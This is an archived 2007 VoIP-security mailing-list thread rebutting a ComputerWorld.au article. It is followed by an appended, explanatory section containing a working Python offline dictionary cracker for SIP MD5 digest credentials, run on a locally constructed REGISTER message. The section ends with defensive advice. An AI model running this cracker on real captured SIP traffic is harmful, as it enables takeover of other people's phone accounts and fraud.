[VOIPSEC] ComputerWorld.au: "Enterprises must avoid IP telephony for teleworkers or face attack" - and my response
Simon Horne
s.horne at packetizer.com
Fri Mar 9 01:33:48 CST 2007
Guys
You also have to be careful to review the story carefully (aside from the
hype) and see that a lot of what is being said is true. Most teleworkers do
not have access to secure VoIP, and if they did, it's expensive and may or
may not interwork with their existing PBX systems. Not mentioned in the
article are other, more serious issues such as hacking the border
controller (the program SIPcrack is an example of how easy that is) and
the malformed or large INVITE message vulnerability of some SIP servers,
which, if the INVITE is formed in a certain manner, can bring down even the
most expensive SIP server.
You shouldn't just throw out the story because it's critical or
over-hyped. A lot of it (not all) is perfectly valid to a simple
teleworker in Australia, maybe not to VoIP security experts in the US who
have access to all the latest VoIP security stuff that simple Joe Blow in
Australia doesn't.
On a side note: let's be honest, a lot of people have profited from this
type of poorly researched, sensationalist journalism. In fact the VoIP
industry would not be where it is today without it. Over the years I have
read a lot of nonsense which promotes an agenda or the flavor-of-the-month
"hype". I think we are only feeling it now because some of the luster is
wearing thin.
For instance, I read this story the other day:
"RADIUS Billing a Thing of the Past: SIP Takes Over"
Huh? SIP takes over RADIUS billing? What has SIP to do with billing? I
researched further and found another article to do with SIP and RADIUS in
the same magazine, and in the body of the article the author had made a
small typo and put "SIP or RADIUS is a good fit" instead of "SIP and RADIUS
is a good fit". Obviously the ill-informed author had seized upon that
typo to create and "hype" a new story without researching the facts on what
exactly RADIUS is.
I think we have to be careful not to believe/react/promote our own press
and stay focused on delivering real world (not just another RFC draft)
secure voice/video solutions to Joe Blow in Australia.
My 2 cents
Simon
At 05:19 AM 9/03/2007, dave_endler at 3com.com wrote:
>Yikes, I'm just now catching up on email after VoiceCon and finally had a
>chance to read the ComputerWorld article. I didn't realize until now that I
>had been quoted in it.
>
>Mark Collier and I presented a 3-hour tutorial on VoIP security this Monday
>at VoiceCon, from which I think the reporter grabbed all of those quotes.
>It's unfortunate that the reporter took about 15 minutes' worth of our
>presentation and used it to further his faulty premise. Our presentation
>outlined certain threats to general VoIP installations, and then detailed
>the specific countermeasures that could be applied to mitigate each threat.
>Mark and I stated several times throughout our presentation that even though
>there are security concerns associated with deploying VoIP (as with any
>application), all of the enterprise class VoIP solutions that we had tested
>are securable with the right amount of effort and research. It's a shame
>that point didn't get included in the article.
>
>Dan York is spot on with his rebuttal on the VOIPSA blog. Having been in
>the security industry for a while, I'm not as surprised anymore at fear
>based reporting. It's just a little more upsetting when it's your own words
>being taken out of context to sex up a headline.
>
>My hope is that as VOIPSA grows as a voice piece in this industry, we can
>continue to combat this type of FUD with our projects, guidelines, and
>outreach messaging.
>
>-dave
>
>Obligatory disclaimer, I work for TippingPoint, which is a division of 3Com
>that develops VoIP products.
>
>David Endler
>Director of Security Research
>TippingPoint, a Division of 3Com
>
>-----Original Message-----
>From: voipsec-bounces at voipsa.org [mailto:voipsec-bounces at voipsa.org] On
>Behalf Of dan_york at Mitel.com
>Sent: Tuesday, March 06, 2007 3:00 PM
>To: voipsec at voipsa.org
>Subject: Re: [VOIPSEC] ComputerWorld.au: "Enterprises must avoid IP
>telephony for teleworkers or face attack" - and my response
>
>Mason,
>
>Sadly, I think we will continue to see this coverage for some time.
>Telling people that VoIP works great for teleworkers (when done right)
>doesn't "sell papers" (or, in today's lingo, "attract links"). Conflict
>does. Fear does. Ergo... this kind of coverage. (Cue "It's the End of
>the World as we Know It!"... dang... I need to get a
>"free-to-play-on-a-podcast" version of that song to play on Blue Box!)
>
>Thanks,
>Dan
>--
>Dan York, CISSP
>Dir of IP Technology, Office of the CTO
>Mitel http://www.mitel.com
>dan_york at mitel.com +1-613-592-2122
>PGP key (F7E3C3B4) available for
>secure communication
>
>
>Mason Harris <maharris at cisco.com>
>Sent by: voipsec-bounces at voipsa.org
>03/05/2007 03:45 PM
>Please respond to maharris
>
> To: dan_york at Mitel.com
> cc: voipsec at voipsa.org
> Subject: Re: [VOIPSEC] ComputerWorld.au: "Enterprises must
>avoid IP telephony for teleworkers or face attack" - and my response
>
>
>Dan, I thought your rebuttal in the blog was spot on. Clearly this is a
>headline aimed at creating paranoia for the uninformed public.
>
>The headline could have just as easily read "Enterprises must avoid
>internet access for remote teleworkers or face attack"
>
>Again we need to help educate the general public that all security
>controls still apply when connecting your IPTel solution to the internet
>(split-tunneling is bad, change default pws, turn off unnecessary
>servers, etc.)
>
>Sadly we'll probably continue to see this kind of "the sky is falling"
>media coverage as teleworker deployments proliferate. Knowledge is power
>in this case, I suppose.
>
>cheers,
>Mason
>
>
>dan_york at Mitel.com wrote:
> > VOIPSEC readers,
> >
> > FYI, ComputerWorld in Australia came out today with the article
> > "Enterprises must avoid IP telephony for teleworkers or face attack"
> > found at:
> >
> > http://www.computerworld.com.au/index.php/id;350011373
> >
> > Since I use (secure) teleworker phones every day, I was rather annoyed
> > at their headline and wrote this response (since I couldn't comment at
> > ComputerWorld.au):
> >
> >
> > http://voipsa.org/blog/2007/03/05/why-computerworldau-is-dead-wrong-about-enterprises-must-avoid-ip-telephony-for-teleworkers-or-face-attack/
> >
> >
> > As you would expect, I will naturally talk about this on this week's
> > Blue Box podcast when Jonathan and I record it later this week.
> >
> > Given that ComputerWorld.au is an IDG property, I would expect that this
> > article might show up on other IDG websites over the next while. (PC
> > World, Linux World, Computer World, InfoWorld, NetworkWorld, CIO, CSO,
> > etc.)
> >
> > Regards,
> > Dan
> >
>
>_______________________________________________
>Voipsec mailing list
>Voipsec at voipsa.org
>http://voipsa.org/mailman/listinfo/voipsec_voipsa.org
>
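Two points in this thread are worth making concrete: Simon's remark that a tool like SIPcrack shows how easily a border controller's credentials can be attacked, and Mason's reminder to change default passwords. The reason both are true is the same: SIP's digest authentication (RFC 3261, reusing the RFC 2617 MD5 scheme) sends everything except the password in the clear, so one sniffed REGISTER or INVITE exchange lets an attacker guess passwords offline at MD5 speed. The following is an added example written for this page; it is not code from any poster in the thread, from SIPcrack, or from any vendor. The user "2001", realm "pbx.example.com", nonce and wordlist are constructed for illustration, and the "captured" REGISTER is built locally rather than sniffed.

```python
"""Offline dictionary attack on SIP digest authentication (RFC 3261 / RFC 2617).

Added example for this thread, not code from any poster or from SIPcrack.
All message text below is constructed; the user, realm, nonce and wordlist
are hypothetical.  The one real value is the RFC 2617 section 3.5 test
vector used in the self-check.
"""
import hashlib
import re


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def sip_digest_response(username, realm, password, method, uri, nonce,
                        qop=None, nc=None, cnonce=None):
    """MD5 digest response exactly as a SIP UA computes it (RFC 2617 3.2.2).

    Every input except `password` travels in the clear, which is what makes
    the offline guess loop below possible.
    """
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    if qop == "auth":
        return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")  # legacy form, still common in SIP


def parse_digest_params(header_value):
    """Turn 'Digest username="x", realm="y", algorithm=MD5' into a dict."""
    scheme, _, params = header_value.partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest credential")
    out = {}
    for m in re.finditer(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', params):
        out[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return out


def extract_request(raw):
    """Return (method, digest-parameter dict) from one sniffed SIP request."""
    lines = raw.split("\r\n")
    method = lines[0].split(" ", 1)[0]
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() in ("authorization", "proxy-authorization"):
            return method, parse_digest_params(value.strip())
    raise ValueError("no Digest credentials in request")


def crack_sip_digest(raw_request, wordlist):
    """Try each candidate password; return the one reproducing the response."""
    method, p = extract_request(raw_request)
    for pw in wordlist:
        guess = sip_digest_response(p["username"], p["realm"], pw, method,
                                    p["uri"], p["nonce"], p.get("qop"),
                                    p.get("nc"), p.get("cnonce"))
        if guess == p["response"]:
            return pw
    return None


# --- constructed sample capture (hypothetical user, realm and nonce) ---
SAMPLE_NONCE = "5f2a9c0d1e3b4a7c"
WORDLIST = ["password", "1234", "2001", "admin", "0000"]


def build_captured_register(password):
    """Simulate the phone's REGISTER after a 401 challenge (constructed)."""
    user, realm = "2001", "pbx.example.com"
    uri, method = "sip:pbx.example.com", "REGISTER"
    resp = sip_digest_response(user, realm, password, method, uri, SAMPLE_NONCE)
    return ("REGISTER sip:pbx.example.com SIP/2.0\r\n"
            "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds\r\n"
            "From: <sip:2001@pbx.example.com>;tag=1928301774\r\n"
            "To: <sip:2001@pbx.example.com>\r\n"
            "Call-ID: a84b4c76e66710\r\n"
            "CSeq: 2 REGISTER\r\n"
            f'Authorization: Digest username="{user}", realm="{realm}", '
            f'nonce="{SAMPLE_NONCE}", uri="{uri}", response="{resp}", '
            "algorithm=MD5\r\n"
            "Content-Length: 0\r\n\r\n")


if __name__ == "__main__":
    weak = build_captured_register("1234")
    print("weak password recovered:", crack_sip_digest(weak, WORDLIST))
    strong = build_captured_register("correct-horse-battery-staple")
    print("strong password recovered:", crack_sip_digest(strong, WORDLIST))
```

The loop is the whole attack: a password that appears in a default or dictionary list falls out after a handful of MD5 calls, while one that does not is simply not found. That is why the controls Mason lists matter more than the headline suggests: a strong per-device password, and TLS on the signaling path so the challenge-response never reaches the sniffer, remove the input this attack needs.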